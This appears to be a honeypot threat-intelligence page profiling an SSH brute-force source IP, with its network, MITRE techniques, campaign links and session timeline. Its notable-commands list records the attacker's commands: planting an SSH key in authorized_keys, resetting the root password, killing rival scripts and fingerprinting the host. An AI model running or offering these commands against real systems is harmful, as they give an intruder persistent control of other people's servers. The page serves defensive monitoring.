← Back to feed

154.81.15.82

Threat Confidence

59%

Location

🇸🇨 SC

ASN

AS135377 · UCLOUD INFORMATION TECHNOLOGY HK LIMITED

Cloud Provider

—

Total Events

338

Top 10% by volume

Agent Count

First / Last Seen

2026-05-15 19:59 — 2026-05-15 21:14

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595 T1595.002

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046 T1082 T1083

Command and Control

T1105

External Corroboration

Blocklist.de

Reported 2026-05-16 20:01

blocklist_de:reported

Campaigns

HASSH f555226df196… — SSH-2.0-libssh_0.9.6 (437 IPs, 72 countries) HASSH Active high 🇺🇸 US

437 IPs 164933 events

http:scanssh:bruteforce

2026-02-25 — ongoing · 437 IPs are running an identical SSH client (HASSH fingerprint f555226df196…). Top network: Tencent Building, Kejizhongyi Avenue (AS132203). …

AS135377 UCLOUD INFORMATION TECHNOLOGY HK LIMITED ASN Active medium 🇭🇰 HK

47 IPs 14138 events

ftp:bruteforcehttp:scanmysql:bruteforcessh:bruteforce

2026-02-18 — ongoing · 47 IPs from the same network (UCLOUD INFORMATION TECHNOLOGY HK LIMITED, AS135377) were active during overlapping time periods. …

Session Forensics

scanner ×20 malware_dropper ×4 credential_probe ×13 opportunistic_bruter ×1

Sessions

38 (5 with login)

Avg Depth Score

0.27

Commands Executed

Files Downloaded

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo "root:BPZYpWGOE83D"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
echo "root:t1br9l5Wu334"|chpasswd|bash
echo "root:26z3rvR7LQbZ"|chpasswd|bash

Fingerprints

HASSH

f555226df1963d1d3c09daf865abdc9a

SSH Client

SSH-2.0-libssh_0.9.6

Evidence Timeline

Credential Probe 5deaef2b8f2e newark_01 · 2026-05-15 21:14

1 20%

Loading events...

Credential Probe 87878401cbc0 newark_01 · 2026-05-15 21:11

1 20%

Loading events...

Credential Probe 8adff800d99f newark_01 · 2026-05-15 21:08

1 20%

Loading events...

Scanner 41eb224d9032 newark_01 · 2026-05-15 21:06

15%

Loading events...

Scanner 79b818870e17 newark_01 · 2026-05-15 21:04

15%

Loading events...

Scanner c08c7b2820dc newark_01 · 2026-05-15 21:01

15%

Loading events...

Scanner 48ed44dd2629 newark_01 · 2026-05-15 20:59

15%

Loading events...

Scanner b08b63e7d3b9 newark_01 · 2026-05-15 20:56

15%

Loading events...

Credential Probe 18a6893b7b06 newark_01 · 2026-05-15 20:54

1 20%

Loading events...

Credential Probe db1dac415698 newark_01 · 2026-05-15 20:51

1 20%

Loading events...

Scanner 7d1662465d9c newark_01 · 2026-05-15 20:49

15%

Loading events...

Scanner eb22d199d05b newark_01 · 2026-05-15 20:46

15%

Loading events...

Malware Dropper 3cac8bc78106 newark_01 · 2026-05-15 20:46

3 1 1 100%

Loading events...

Opportunistic Bruter db2e202aa100 newark_01 · 2026-05-15 20:46

1 50%

Loading events...

Credential Probe 86e35b6ea4e6 newark_01 · 2026-05-15 20:44

1 20%

Loading events...

Scanner 8d459c92530b newark_01 · 2026-05-15 20:41

15%

Loading events...

Scanner f531830cff80 newark_01 · 2026-05-15 20:39

15%

Loading events...

Scanner 94b2b73992a7 newark_01 · 2026-05-15 20:36

15%

Loading events...

Credential Probe a8379410eecc newark_01 · 2026-05-15 20:34

1 20%

Loading events...

Credential Probe 118996a28f56 newark_01 · 2026-05-15 20:31

1 20%

Loading events...

Credential Probe 0441449733d1 newark_01 · 2026-05-15 20:29

1 20%

Loading events...

Credential Probe df7076a4fe74 newark_01 · 2026-05-15 20:26

1 20%

Loading events...

Credential Probe cf73d93dec2f newark_01 · 2026-05-15 20:24

1 20%

Loading events...

Scanner d3159b36d936 newark_01 · 2026-05-15 20:21

15%

Loading events...

Malware Dropper 7134f0267eb2 newark_01 · 2026-05-15 20:21

20 2 1 100%

Loading events...

Scanner b18f917905ba newark_01 · 2026-05-15 20:21

15%

Loading events...

Malware Dropper 6b7015cbc911 newark_01 · 2026-05-15 20:19

20 2 1 100%

Loading events...

Scanner 3c6a2f733474 newark_01 · 2026-05-15 20:19

15%

Loading events...

Scanner b8f874f6ece5 newark_01 · 2026-05-15 20:19

15%

Loading events...

Scanner 286e9b811c9b newark_01 · 2026-05-15 20:16

15%

Loading events...

Credential Probe 3ec1d0363d42 newark_01 · 2026-05-15 20:14

1 20%

Loading events...

Scanner 1a3b830dd397 newark_01 · 2026-05-15 20:11

15%

Loading events...

Scanner acd6ec934624 newark_01 · 2026-05-15 20:08

15%

Loading events...

Malware Dropper ff674bc0c554 newark_01 · 2026-05-15 20:06

20 2 1 100%

Loading events...

Scanner ddb0c7c93a84 newark_01 · 2026-05-15 20:06

15%

Loading events...

Scanner 578d29ae52e4 newark_01 · 2026-05-15 20:06

15%

Loading events...

Scanner 882fe7288920 newark_01 · 2026-05-15 20:03

15%

Loading events...

Credential Probe c7952c8134f3 newark_01 · 2026-05-15 19:59

1 20%

Loading events...